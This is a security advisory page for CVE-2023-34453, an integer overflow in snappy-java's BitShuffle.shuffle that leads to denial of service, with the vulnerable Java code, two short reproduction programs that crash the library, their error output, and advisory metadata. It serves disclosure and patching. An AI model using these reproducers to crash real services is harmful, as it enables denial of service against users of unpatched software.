ghsa-pqr6-cmr2-h8hf
Vulnerability from github
Published
2023-06-15 16:13
Modified
2023-06-27 21:57
Summary
snappy-java's Integer Overflow vulnerability in shuffle leads to DoS
Details

Summary

Due to unchecked multiplications, an integer overflow may occur, causing a fatal error.

Impact

Denial of Service

Description

The function shuffle(int[] input) in the file BitShuffle.java receives an array of integers and applies a bit shuffle on it. It does so by multiplying the length by 4 and passing it to the natively compiled shuffle function.

```java public static byte[] shuffle(int[] input) throws IOException { byte[] output = new byte[input.length * 4]; int numProcessed = impl.shuffle(input, 0, 4, input.length * 4, output, 0); assert(numProcessed == input.length * 4); return output; }

```

Since the length is not tested, the multiplication by four can cause an integer overflow and become a smaller value than the true size, or even zero or negative. In the case of a negative value, a “java.lang.NegativeArraySizeException” exception will raise, which can crash the program. In a case of a value that is zero or too small, the code that afterwards references the shuffled array will assume a bigger size of the array, which might cause exceptions such as “java.lang.ArrayIndexOutOfBoundsException”. The same issue exists also when using the “shuffle” functions that receive a double, float, long and short, each using a different multiplier that may cause the same issue.

Steps To Reproduce

Compile and run the following code:

```java package org.example; import org.xerial.snappy.BitShuffle;

import java.io.*;

public class Main {

public static void main(String[] args) throws IOException {
    int[] original = new int[0x40000000];
    byte[] shuffled = BitShuffle.shuffle(original);
    System.out.println(shuffled[0]);
}

}

``` The program will crash, showing the following error (or similar):

``` Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: Index 0 out of bounds for length 0 at org.example.Main.main(Main.java:12)

Process finished with exit code 1

```

Alternatively - compile and run the following code:

```java package org.example; import org.xerial.snappy.BitShuffle;

import java.io.*;

public class Main {

public static void main(String[] args) throws IOException {
    int[] original = new int[0x20000000];
    byte[] shuffled = BitShuffle.shuffle(original);
}

}

``` The program will crash with the following error (or similar):

Exception in thread "main" java.lang.NegativeArraySizeException: -2147483648 at org.xerial.snappy.BitShuffle.shuffle(BitShuffle.java:108) at org.example.Main.main(Main.java:11)

Show details on source website


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.10.0"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.xerial.snappy:snappy-java"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-34453"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-190"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-06-15T16:13:20Z",
    "nvd_published_at": "2023-06-15T17:15:09Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\nDue to unchecked multiplications, an integer overflow may occur, causing a fatal error.\n## Impact\nDenial of Service\n## Description\nThe function [shuffle(int[] input)](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/BitShuffle.java#L107) in the file [BitShuffle.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/BitShuffle.java) receives an array of integers and applies a bit shuffle on it. It does so by multiplying the length by 4 and passing it to the natively compiled shuffle function.\n\n```java\npublic static byte[] shuffle(int[] input) throws IOException {\n        byte[] output = new byte[input.length * 4];\n        int numProcessed = impl.shuffle(input, 0, 4, input.length * 4, output, 0);\n        assert(numProcessed == input.length * 4);\n        return output;\n    }\n\n```\n\nSince the length is not tested, the multiplication by four can cause an integer overflow and become a smaller value than the true size, or even zero or negative. In the case of a negative value, a \u201cjava.lang.NegativeArraySizeException\u201d exception will raise, which can crash the program. In a case of a value that is zero or too small, the code that afterwards references the shuffled array will assume a bigger size of the array, which might cause exceptions such as \u201cjava.lang.ArrayIndexOutOfBoundsException\u201d.\nThe same issue exists also when using the \u201cshuffle\u201d functions that receive a double, float, long and short, each using a different multiplier that may cause the same issue.\n\n## Steps To Reproduce\nCompile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.BitShuffle;\n\nimport java.io.*;\n\n\npublic class Main {\n\n    public static void main(String[] args) throws IOException {\n        int[] original = new int[0x40000000];\n        byte[] shuffled = BitShuffle.shuffle(original);\n        System.out.println(shuffled[0]);\n    }\n}\n\n```\nThe program will crash, showing the following error (or similar):\n\n```\nException in thread \"main\" java.lang.ArrayIndexOutOfBoundsException: Index 0 out of bounds for length 0\n\tat org.example.Main.main(Main.java:12)\n\nProcess finished with exit code 1\n\n```\n\nAlternatively - compile and run the following code:\n\n```java\npackage org.example;\nimport org.xerial.snappy.BitShuffle;\n\nimport java.io.*;\n\n\npublic class Main {\n\n    public static void main(String[] args) throws IOException {\n        int[] original = new int[0x20000000];\n        byte[] shuffled = BitShuffle.shuffle(original);\n    }\n}\n\n```\nThe program will crash with the following error (or similar):\n\n```\nException in thread \"main\" java.lang.NegativeArraySizeException: -2147483648\n\tat org.xerial.snappy.BitShuffle.shuffle(BitShuffle.java:108)\n\tat org.example.Main.main(Main.java:11)\n```",
  "id": "GHSA-pqr6-cmr2-h8hf",
  "modified": "2023-06-27T21:57:08Z",
  "published": "2023-06-15T16:13:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xerial/snappy-java/security/advisories/GHSA-pqr6-cmr2-h8hf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34453"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xerial/snappy-java/commit/820e2e074c58748b41dbd547f4edba9e108ad905"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xerial/snappy-java"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/BitShuffle.java#L107"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/BitShuffle.java"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "snappy-java\u0027s Integer Overflow vulnerability in shuffle leads to DoS"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading...

Loading...

Loading...

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.